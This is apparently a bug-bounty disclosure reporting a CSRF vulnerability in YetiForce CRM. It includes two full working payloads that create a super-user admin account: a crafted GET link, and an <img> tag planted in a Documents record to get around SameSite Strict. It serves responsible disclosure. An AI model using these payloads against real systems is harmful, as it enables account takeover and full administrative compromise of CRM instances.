Description

Hi there, I would like to report a CSRF vulnerability in yetiforcecompany/yetiforcecrm.
This allows an attacker to create a new admin.
Even when SameSite: Strict enable, this still can be exploited by an attacker with lowest privilege account (E.g. guest).

Proof of Concept

• These are POCs for 2 scenario, both leads to create a new admin with username testggwp and password Admin@123.

• Scenario 1: SameSite is None or Lax

• Trick admin to access below link

/index.php?module=Users&parent=Settings&view=Edit&fromView=Create&action=Save&picklistDependency=%5b%5d&mappingRelatedField=%5b%5d&listFilterFields=%5b%5d&defaultOtherEventDuration=%5b%7b%22activitytype%22%3a%22Call%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Meeting%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Task%22%2c%22duration%22%3a%2260%22%7d%5d&user_name=testggwp&is_admin=1&first_name=testggwp&last_name=testggwp&roleid=H14&status=Active&user_password=Admin@123&confirm_password=Admin@123&super_user=1&[email protected]&secondary_email=&primary_phone_country=AF&primary_phone=&primary_phone_extra=&phone_crm_extension_country=AF&phone_crm_extension=&phone_crm_extension_extra=&emailoptout=0&date_format=dd-mm-yyyy&hour_format=24&time_zone=Asia%2fBangkok&dayoftheweek=Monday&activity_view=This+Month&defaultactivitytype=Meeting&defaulteventstatus=PLL_PLANNED&view_date_format=PLL_ELAPSED&reminder_interval=15+Minutes&othereventduration=%5b%7b%22activitytype%22%3a%22Call%22%2c%22duration%22%3a60%7d%2c%7b%22activitytype%22%3a%22Meeting%22%2c%22duration%22%3a60%7d%2c%7b%22activitytype%22%3a%22Task%22%2c%22duration%22%3a60%7d%5d&activitytype=Call&duration=60&activitytype=Meeting&duration=60&activitytype=Task&duration=60&currency_id=1&currency_decimal_separator=.&currency_symbol_placement=1.0%24&truncate_trailing_zeros=0&currency_grouping_pattern=123%2c456%2c789&currency_grouping_separator=+&no_of_currency_decimals=2&start_hour=08%3a00&end_hour=16%3a00&language=&rowheight=medium&leftpanelhide=0&default_record_view=Summary&theme=twilight&imagename=%5b%5d&login_method=PLL_PASSWORD&internal_mailer=0&sync_carddav=PLL_OWNER&sync_caldav=PLL_OWNER&sync_carddav_default_country=&default_search_module=&default_search_override=0&default_search_operator=PLL_CONTAINS&available=0&auto_assign=0&records_limit=0&description=&popupReferenceModule=Users&reports_to_id=0&reports_to_id_display=&isPreference=&timeFormatOptions=

• Scenario 2: Samesiteis Strict

• Create a record in Documents with below payload in description (click source then paste). After that, trick Admin to visit the record.

<img src="/index.php?module=Users&parent=Settings&view=Edit&fromView=Create&action=Save&picklistDependency=%5b%5d&mappingRelatedField=%5b%5d&listFilterFields=%5b%5d&defaultOtherEventDuration=%5b%7b%22activitytype%22%3a%22Call%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Meeting%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Task%22%2c%22duration%22%3a%2260%22%7d%5d&user_name=testggwp&is_admin=1&first_name=testggwp&last_name=testggwp&roleid=H14&status=Active&user_password=Admin@123&confirm_password=Admin@123&super_user=1&[email protected]&secondary_email=&primary_phone_country=AF&primary_phone=&primary_phone_extra=&phone_crm_extension_country=AF&phone_crm_extension=&phone_crm_extension_extra=&emailoptout=0&date_format=dd-mm-yyyy&hour_format=24&time_zone=Asia%2fBangkok&dayoftheweek=Monday&activity_view=This+Month&defaultactivitytype=Meeting&defaulteventstatus=PLL_PLANNED&view_date_format=PLL_ELAPSED&reminder_interval=15+Minutes&othereventduration=%5b%7b%22activitytype%22%3a%22Call%22%2c%22duration%22%3a60%7d%2c%7b%22activitytype%22%3a%22Meeting%22%2c%22duration%22%3a60%7d%2c%7b%22activitytype%22%3a%22Task%22%2c%22duration%22%3a60%7d%5d&activitytype=Call&duration=60&activitytype=Meeting&duration=60&activitytype=Task&duration=60&currency_id=1&currency_decimal_separator=.&currency_symbol_placement=1.0%24&truncate_trailing_zeros=0&currency_grouping_pattern=123%2c456%2c789&currency_grouping_separator=+&no_of_currency_decimals=2&start_hour=08%3a00&end_hour=16%3a00&language=&rowheight=medium&leftpanelhide=0&default_record_view=Summary&theme=twilight&imagename=%5b%5d&login_method=PLL_PASSWORD&internal_mailer=0&sync_carddav=PLL_OWNER&sync_caldav=PLL_OWNER&sync_carddav_default_country=&default_search_module=&default_search_override=0&default_search_operator=PLL_CONTAINS&available=0&auto_assign=0&records_limit=0&description=&popupReferenceModule=Users&reports_to_id=0&reports_to_id_display=&isPreference=&timeFormatOptions="> 

Impact

After csrf payload is triggered, attacker can become an admin with full privilege.